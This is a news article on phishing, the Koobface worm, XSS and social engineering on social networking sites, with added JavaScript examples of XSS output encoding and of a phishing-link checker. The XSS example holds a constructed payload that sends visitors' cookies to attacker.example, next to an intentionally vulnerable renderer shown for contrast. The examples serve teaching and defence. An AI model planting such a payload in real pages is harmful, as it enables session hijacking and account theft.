Cyber criminals are targeting users of social networking sites
In one of the most high-profile account hijackings in recent times, the Twitter accounts of the British Energy Secretary, Ed Miliband, and House of Commons Leader, Harriet Harman, were broken into and used to send “inappropriate” messages to their followers.
Following this, the official residence of the British Prime Minister, 10 Downing Street, was reported to have commissioned security checks on its own Twitter account and that of the Prime Minister, Gordon Brown, and his wife.
The British politicians are only the latest in a long line of victims of social networking scams. And they won’t be the last.
Every other day, news of cyber-attacks and ‘phishing scams’ on social networking sites hits the Web, but the reports often go unnoticed in the media frenzy surrounding these sites, especially Twitter.
Phishing involves sending out legitimate-looking e-mails or messages that appear to come from popular, trusted sites in order to harvest login credentials and personal or financial information. The messages steer recipients to Web sites that closely mimic the ones they use, and any details typed into such a page go straight to the attacker.
RING OF FIRE
Social networking sites, according to a report by security firm Symantec, topped the list of targets for phishing attacks in most countries across the globe.
Almost all the top sites, including Twitter, Facebook, MySpace, and Orkut, have reported security vulnerabilities, which they made efforts to fix.
Perhaps the most notorious of these was Koobface (an anagram of ‘Facebook’), a computer worm that targets users of sites such as Bebo, Friendster, MySpace and Facebook and attempts to harvest sensitive data such as credit card numbers.
The worm spreads by delivering messages with links to a “video,” to friends of an infected Facebook user.
Those who click on the link are taken to a third-party site and told to install an executable file in order to view the “video.” If the user installs it, the machine is infected: the worm disables security software and leaves the computer open to the attackers.
“Once infected, users are directed to more fraudulent Web sites risking identity theft and will spam more friends, leading to an exponential rise in infections,” says Debasis Nayak, Director of the Pune-based Asian School of Cyber Laws.
Last year, Twitter acknowledged “unauthorised access” by a French hacker who is believed to have broken into the site’s internal administration systems, gaining access to users’ accounts.
A 2009 report by security firm Sophos named Barack Obama, Britney Spears, Ashton Kutcher and Lily Allen as “(Twitter) users known to have been affected by the French hacker’s subsequent actions.”
Orkut, Facebook and Twitter have all reported cross-site scripting (XSS) holes. XSS is a vulnerability that lets an attacker inject script into a Web page served by a trusted site; the script then runs in other users’ browsers with that site’s privileges, where it can read session cookies, act as the logged-in user or redirect the victim to a phishing page.
The injected code may arrive as a specially crafted hyperlink, sent by e-mail or as a message, that the victim clicks on, or it may be planted in a profile or post so that it runs for everyone who views that page.
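The following is an added example, not code from the article or from any of the sites it names, showing how an XSS hole of the kind described above arises and how output encoding closes it. It mimics a profile page that echoes a user-supplied status line; the payload, the host name attacker.example and all function names are constructed for illustration. It runs under Node.js without a browser because the renderers simply return HTML strings.

```javascript
// Added example (not from the article): a social-network style profile
// renderer with an XSS hole, next to the hardened version.
// Runs in Node.js; the functions return HTML strings rather than touching a DOM.

// Escape the five characters that let text break out of its HTML context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// VULNERABLE: user-controlled text is concatenated straight into markup.
// A profile field (stored XSS) or a search term copied from the URL of a
// link the victim clicked (reflected XSS) both end up here unchanged.
function renderProfileUnsafe(displayName, statusText) {
  return `<h1>${displayName}</h1><p class="status">${statusText}</p>`;
}

// HARDENED: every untrusted value is HTML-encoded before interpolation,
// so the browser shows the payload as text instead of executing it.
function renderProfileSafe(displayName, statusText) {
  return `<h1>${escapeHtml(displayName)}</h1><p class="status">${escapeHtml(statusText)}</p>`;
}

// Constructed payload of the kind the text describes: a "status" that, if
// interpreted as markup, sends every visitor's cookies to the attacker.
const PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Crude check used only to contrast the two renderers: does the output
// contain a tag that the template author never wrote?
function containsInjectedTag(html) {
  return /<(?:script|img|iframe|svg)\b/i.test(html);
}

// Render the same attacker-supplied status through both paths.
function demo() {
  const unsafe = renderProfileUnsafe('alice', PAYLOAD);
  const safe = renderProfileSafe('alice', PAYLOAD);
  return {
    unsafeInjected: containsInjectedTag(unsafe), // true: <img onerror> survives
    safeInjected: containsInjectedTag(safe),     // false: it is now &lt;img ...&gt;
    safeHtml: safe,
  };
}

console.log(demo());
```

Encoding at the point of output is the fix; filtering `<script>` out of the input is not, because the payload above contains no script tag at all and would pass such a filter.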
In November 2009, Symantec reported a malicious spam attack on Facebook, which was followed by a phishing attack. According to research published by Symantec, these spam messages looked like “an official invite or password reset confirmation mail.”
Once users click on the button marked ‘update’, they are “redirected to a look-alike phishing site. Here, users are asked to enter a password to complete the update procedure. Unfortunately, users’ passwords will be stolen if they try to log in, on this page,” the Symantec report states.
So what is it about networking sites that draws hackers by the dozen? Ratnamala Dam Manna, Director, Security Technology and Responses at Symantec, affirms that these sites have “grown to become the most obvious choice for attackers.”
According to a Trend Micro technical paper, “The shift from desktop-based applications to Web-based ones, particularly those on social networking sites, presents a new vector for abuse.”
“As more and more people communicate through social networks, the more viable social networks become malware distribution platforms,” the Trend Micro report states.
Malware, or ‘malicious software’, is any program designed to get into a computer and carry out actions its owner did not authorise. Viruses, trojans, spyware and worms are all malware; they differ in how they spread and in what they do once installed.
Ratnamala avers that networking sites are “easy for criminals to spoof and since social networking pages are generally trusted by users, phishing attacks mimicking them may be more successful.”
Users often tend to disclose personal details and post photographs on their profiles. “Hackers use information gathered from others to carry out a social engineering attack,” she says.
Social engineering is the act of manipulating or tricking people into revealing personal or sensitive information. The attacker may use non-intrusive methods, and gain the confidence of the person, in order to gain access to the system or perpetrate a fraud. Phishing is one of the most common forms of social engineering.
Says Nayak, “Users of sites such as Orkut, Badoo, Perfspot, Twitter and Facebook are facing social engineering attacks. The attacks are based on the fact that subscribers tend to believe messages from friends on these sites more than they would believe spam e-mails.”
IMPACT ON BUSINESS
Research by Sophos has revealed that “two-thirds of businesses fear that social networking endangers corporate security.”
System administrators, the Sophos report adds, worry that “employees share too much personal information via their social networking sites, putting their corporate infrastructure — and the sensitive data stored on it — at risk.”
However, the growing popularity of networking sites and the benefits they provide seem, for most organisations, to outweigh the risks.
Organisations and individuals, Sophos recommends, should perform regular Internet security checks, educate fellow users about risks and make sure sensitive information is not shared online.
Symantec advises users to be on their guard, especially if they notice anything unusual in e-mails they receive (typos, odd words, phrases or IP numbers). To ward off phishing attacks, “simply pass the cursor over the underlined hyperlink and then check the URL in the status bar of the browser. In the status bar, they can see if the link belongs to the appropriate domain or not,” the advisory states. The part to check is the domain immediately before the first single slash: a link to “facebook.com.example.net” belongs to example.net, not to Facebook, and the visible text of a link may show one address while its destination is another. Users are also advised to type the name of the Web site directly into the address bar of the browser, use complex passwords, and avoid clicking on suspicious links or installing updates from unknown sites.
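The check the advisory describes, as an added example that is not part of the article or of Symantec’s advisory: given the visible text of a link and the address it really points to, the code below reports why the link should not be trusted for a site expected to live under a given domain. The sample links are constructed to resemble a fake “password reset” mail of the kind reported above; facebook.com is used as the expected domain, and the other host names are invented. It relies only on the URL parser built into Node.js.

```javascript
// Added example (not from the article): "check where the link really goes",
// as code. Catches the tricks that make a hovered URL look legitimate.
// Runs under Node.js, which ships the WHATWG URL parser as a global.

const IPV4 = /^\d{1,3}(\.\d{1,3}){3}$/;

// True only if host is the expected domain or a subdomain of it.
// "www.facebook.com" passes; "facebook.com.evil.example" does not.
function hostBelongsTo(host, expectedDomain) {
  host = host.toLowerCase();
  expectedDomain = expectedDomain.toLowerCase();
  return host === expectedDomain || host.endsWith('.' + expectedDomain);
}

// Returns { ok, host, reasons } for one link.
function checkLink(linkText, href, expectedDomain) {
  const reasons = [];
  let url;
  try {
    url = new URL(href);
  } catch (e) {
    return { ok: false, host: null, reasons: ['href is not a valid absolute URL'] };
  }
  const host = url.hostname;
  if (url.protocol !== 'https:' && url.protocol !== 'http:') {
    reasons.push(`non-web scheme ${url.protocol}`);
  }
  if (url.username || url.password) {
    // "http://www.facebook.com@evil.example/": everything before "@" is
    // user-info, not the host, so the real destination is evil.example.
    reasons.push('credentials in URL disguise the real host');
  }
  if (IPV4.test(host) || host.startsWith('[')) {
    reasons.push('raw IP address instead of a domain name');
  }
  if (/(^|\.)xn--/.test(host)) {
    reasons.push('internationalised (punycode) label, possible look-alike letters');
  }
  if (!hostBelongsTo(host, expectedDomain)) {
    reasons.push(`host "${host}" is not under ${expectedDomain}`);
    // Link text that names the expected site while the href goes elsewhere.
    if (linkText.toLowerCase().includes(expectedDomain.toLowerCase())) {
      reasons.push('link text names the site but the href goes elsewhere');
    }
  }
  return { ok: reasons.length === 0, host, reasons };
}

// Constructed [visible text, href] pairs from an imagined "reset your password" mail.
const SAMPLE_LINKS = [
  ['Update your password', 'https://www.facebook.com/settings'],
  ['http://www.facebook.com/update', 'http://www.facebook.com.account-verify.example/update'],
  ['Update', 'http://www.facebook.com@203.0.113.7/update'],
  ['Update', 'http://faceb00k.com/update'],
  ['Update', 'javascript:void(0)'],
];

// Run every link through checkLink and keep the verdict beside the link.
function auditLinks(links, expectedDomain) {
  return links.map(([text, href]) => ({ text, href, ...checkLink(text, href, expectedDomain) }));
}

for (const r of auditLinks(SAMPLE_LINKS, 'facebook.com')) {
  console.log(r.ok ? 'OK  ' : 'WARN', r.href, r.reasons.join('; '));
}
```

Only the first sample link passes. The second is the subdomain trick the advisory’s “appropriate domain” wording is aimed at, the third hides an IP address behind user-info, the fourth is a look-alike spelling, and the last is not a Web address at all.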
Nayak adds, “Be aware of and use security software for the browser and computer, and avoid turning on features such as ActiveX controls in the browser as far as possible.”
Dos and don’ts
Use up-to-date browsers and operating systems
Perform regular security scans of your computer
Do not share personal or financial information online
Ignore/delete suspicious e-mails, attachments
Check Web site links before clicking on them
Use complex passwords
Source: The Hindu Businessline